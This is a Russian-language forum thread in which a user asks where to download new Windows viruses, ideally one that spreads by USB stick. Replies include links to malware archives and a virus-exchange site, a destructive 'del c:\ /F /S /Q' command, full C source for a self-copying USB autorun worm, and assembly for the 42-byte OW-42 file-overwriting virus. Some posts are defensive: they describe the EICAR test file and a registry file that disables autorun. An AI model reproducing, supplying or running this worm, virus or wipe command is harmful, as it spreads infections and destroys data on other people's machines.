[хочется странного] где в нете скачать хороших новых вирусов?

сходи на ближайшую почту или аналог и распечатай там чтонить за 5р/страничка. с бОльшей вероятностью уйдёшь с паровозиком.

// wbr

Двачую

А в нете негде?
Я вот тут прочитал http://habrahabr.ru/blogs/virus/69403
пишут, что есть интересный вирусяк, который используя дырку в эксплорере сам запускается при входе в папку.
Вот ченить такое бы.
Ну, если такого нету, то хоть какойнить.

Матёрых таких, да? :-D

Да вы озверели! Каждую неделю одно и то же...

ed2k

В линуксе нет вирусов.

Что уже спрашивали?

Какие ужасы! Мы тут привыкли к линукс, забываем уже про это... Разнежились совсем :)

>ed2k

Anna Kurnikova.jpg.exe

Мне под винду.
Дайте хоть пару ссылок!

1. Вспоминаешь названия всех сексуальных извращений, которые знаешь.

2. Вводишь их в строку поиска гугла.

3. Ходишь по ссылкам, скачивая от туда видео.

4. ?????????

5. PROFIT!

del c:\ /F /S /Q /A S H A D

-bash: del: команда не найдена

Ходил по всяким злачным сайтам, ставил какието кодеки.
Флешка чистая, ничего не получается.

Кастуй Cansellor'а, он понимт ссылку.

гугли linux virus sources

>гугли linux virus sources
Тык мне под винду же.

Поставь xp ,отключи фаервол и устрой серфинг по <злачным местам>.ru
- и менее чем за час должны быть "насекомые" в системе.

Да я так и сделал, флешка по прежнему чистая.

Через 10 минут http://cynicmansion.ru/virus.tar.gz
Что именно делают - не знаю. У меня поотрубали доступ к менюшкам в эксплорере, а при запуске сразу всех вообще винду убили.
Ещё где-то был фейковый антивирус, нужно поискать. Назывался вроде CoreGuardAntivirus.

Спасибо.
Мне бы чтобы он на флешке поселился...

по ссылке редирект сюда http://phpnet.us/notify/2.php

чтобы заразить флешку

http://tinyurl.com/pqovpc

не?

Не, ничего нормального там нету.

Мда, загрузка не прошла. Сейчас на народ залью, скину ссылку

Чтобы проверить работу антивируса?

Откройте для себя eicar - файл для тестирования антивирусов.

http://www.eicar.org/anti_virus_test_file.htm

Скачиваете eicar.com (на время скачивания антивирус отключается).

Кладете в корень флешки и туда же autorun.inf

[autorun]
open=eicar.com

При втыкании флешки в компьютер антивирус должен ругаться.

Также откройте для себя полное отключение автозапуска

Импортируете *.reg файл.
DISCLAYMER - Файл приводится как есть.
Я не несу никакой ответственности за любые проблемы,
возникшие на компьютере вследствие импорта нижеуказанного reg файла.

--DISABLE_AUTORUN_V2.REG.B64_BEGIN_BASE64_ENCODE----------------
UkVHRURJVDQNCg0KW0hLRVlfTE9DQUxfTUFDSElORVxTT0ZUV0FSRVxNaWNyb3Nv
ZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xFeHBsb3Jlcl0NCiJO
b0RyaXZlVHlwZUF1dG9SdW4iPWR3b3JkOjAwMDAwMGZmDQoiTm9Ecml2ZUF1dG9S
dW4iPWR3b3JkOjAzZmZmZmZmDQoNCltIS0VZX0xPQ0FMX01BQ0hJTkVcU1lTVEVN
XEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXGNkcm9tXQ0KIkF1dG9SdW4iPWR3
b3JkOjAwMDAwMDAwDQoNCltIS0VZX0xPQ0FMX01BQ0hJTkVcU09GVFdBUkVcTWlj
cm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcQXV0b3BsYXlI
YW5kbGVyc1xDYW5jZWxBdXRvcGxheVxGaWxlc10NCiIqLioiPSIiDQoNCltIS0VZ
X0xPQ0FMX01BQ0hJTkVcU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3Vy
cmVudFZlcnNpb25cSW5pRmlsZU1hcHBpbmdcQXV0b3J1bi5pbmZdDQpAPSJAU1lT
OkRvZXNOb3RFeGlzdCINCg0KWy1IS0VZX0NVUlJFTlRfVVNFUlxTb2Z0d2FyZVxN
aWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxFeHBsb3JlclxNb3VudFBv
aW50czJdDQoNCg==
--DISABLE_AUTORUN_V2.REG.B64_END_BASE64_ENCODE----------------

После этого даже втыкание флэшки с вирусами в компьютер ни к чему не должно приводить

в чём проблема то? сам напиши

После этого даже втыкание флэшки с вирусами в компьютер ни к чему не должно приводить

До тех пор пока ты не воткнёшь две флешки или флешку которую винда распознает как новое устойство, и винда исправит ошибку внесённую пользователем.

А ты в этом уверен? некоторые вири с автораном блокируют доступ к вирусам на флешке из винды, они оттуда даже не видны.

http://omploader.org/vMmQwMA/virus.tar.gz

ЭЭээ... куда импортировать? Поставил gconf, не хочет импортировать. Говорит неизвестный формат.

А так да нет же глупый, просто разместить на файлопомойке, пользователей заботы для

Чето не серьезная фигня какая то...

Список опасных сайтов по версии Norton Safe Web (August 2009) http://safeweb.norton.com/dirtysites

http://vx.netlux.org/

http://vx.netlux.org - вот еще немного, не знаю, насколько новое.

Пока вспоминал пароль - опередил :)

Заходил. Там все в одном списке и не понятно что делает и какой давности.

Не везет...

#include <stdio.h>
#include <time.h>
#include <windows.h>

char name[] = "ntldr.exe"

//check for virus
int viruscheck(char* drvname)
{
    FILE* test;
    char buf[256];
    sprintf(buf,"%s%s", drvname, name);
    if(test = fopen(buf, "rb"))
    {
        fclose(test);
        return 0;
    }
    return 1;
}

void infecting(char* myname)
{

        FILE* src;
        FILE* dest;

        //init /dev/urandom =)
        srand(time(0));

        //try to infect all drives
        char i;
        for(i=67;i<=90;i++)
        {
                char buf[256];
                char* rname;
                //chek drive && check for virus
                char drvname[10];
                sprintf(drvname,"%c:\\", i);
                if ( (GetDriveTypeA(drvname ) == DRIVE_CDROM)  || !viruscheck(drvname) ) ;//do nothing

                else // YAHOOO!!!! I-N-F-E-C-T !!!!
                {
                        //try to create autorun.inf
                        sprintf(buf,"%c:\\autorun.inf", i);
                        if (src = (fopen(buf, "w+" )))
                        {
                                fprintf(src,"[autorun]\nshellexecute=%s\n", name);
                                fclose (src);
                        }

                        //try to copy virus to   C:\   D:\    etc.
                        char *tmp[256];
                        if (src = (fopen(myname, "rb")))
                        {
                                sprintf(buf,"%c:\\%s", i, name);
                                if (dest = (fopen(buf, "wb")))
                                {
                                        while(fread(&tmp, 1,  sizeof(tmp), src))
                                                fwrite(tmp, 1, sizeof(tmp), dest);
                                        fclose(dest);
                                }
                                fclose(src);
                        }
                }//end infect
        }//end for(i=67;i<=90;i++)
}

int main(int argc, char** argv)
{

        //open explorer
        ShellExecuteA(0, "Open", ".",   0, 0, SW_SHOW);

        //main procedure
        while(1)
        {
                infecting(argv[0]);
                Sleep((rand()%6)*5000);
        }

        return 0;

}

Дальше сам допишешь

Помнится был какойто, который заражал pdf-ки и когда експлорер делал миниатюру, то происходило заражение.
Не напомните как назывался?

> просто разместить на файлопомойке

Всегда пожалуйста.

http://www.heypasteit.com/clip/C4H

Мой самописный антивирус тоже на eicar ругается, только вот кроме него ничего не ловит.

>>После этого даже втыкание флэшки с вирусами в компьютер ни к чему не должно приводить

> До тех пор пока ты не воткнёшь две флешки или флешку которую винда распознает как новое устойство, и винда исправит ошибку внесённую пользователем.

Указанный файл отключает автозагрузку в четырех местах и чистит кэш ранее подключенных флэшек. Я еще пока не сталкивался с тем, чтобы эти ключи автоматически восстановились.

Согласен, ни в чем нельзя быть уверенным до конца.

Можете, например, попробовать под WinXP SP3 переименовать (но на всякий случай не удалять) файл c:\windows\system32\sort.exe в sorta.exe . И увидите, как в течение минуты снова из пепла возродиться файл sort.exe.

Надеюсь Microsoft не выпустит патч, которых заставит winlogon.exe, помимо восстановления файлов, восстанавливать возможность автозапуска вирусов.

> чтобы заразить флешку

Просто установите винду и подключите ее к сети. Утром у вас будет рассадник.

Забудь обновить nginx и наблюдай, как сотни злоумышленников получают контроль над процессом веб-сервера и закачивают тебе вирусы.

расскопал таки свои архивы далёкого 95-го года. весёлое было время. вот вам самый простенький из коллекции — целых 42 байта, портит только com-ы. интерессно, оно под виндой заведётся?

;OW-42 virus - TridenT group, edited for Crypt Newsletter 13
;


CODE    SEGMENT
        ASSUME  CS:CODE, DS:CODE, ES:CODE, SS:NOTHING

        org     0100h

start:  mov     ah,4Eh                  ; find first file
recurse: 
        mov     dx,0123h                ; matching filemask, "*.*"
        int     21h                     


        db      72h,20h                 ;hand-coded jump on carry to
                                        ;exit if no more files found
        mov     ax,3D01h                
        mov     dx,009Eh                
        int     21h                     

        mov     bh,40h                  
        mov     dx,0100h                ;starting from beginning
        xchg    ax,bx                   ;put handle in ax
        mov     cl,2Ah                  ;to write: 42 bytes of virus 
        int     21h                     ;write the virus
        mov     ah,3Eh                  ;close the file
        int     21h                     

        mov     ah,4Fh                  ;find next file
        jmp     Short recurse


        db    "*.COM"                   ;file_mask 
        dw     0C300h                   ;hand-coded return

CODE    ENDS
        END     START

Ставишь венду и гуляешь по интернету.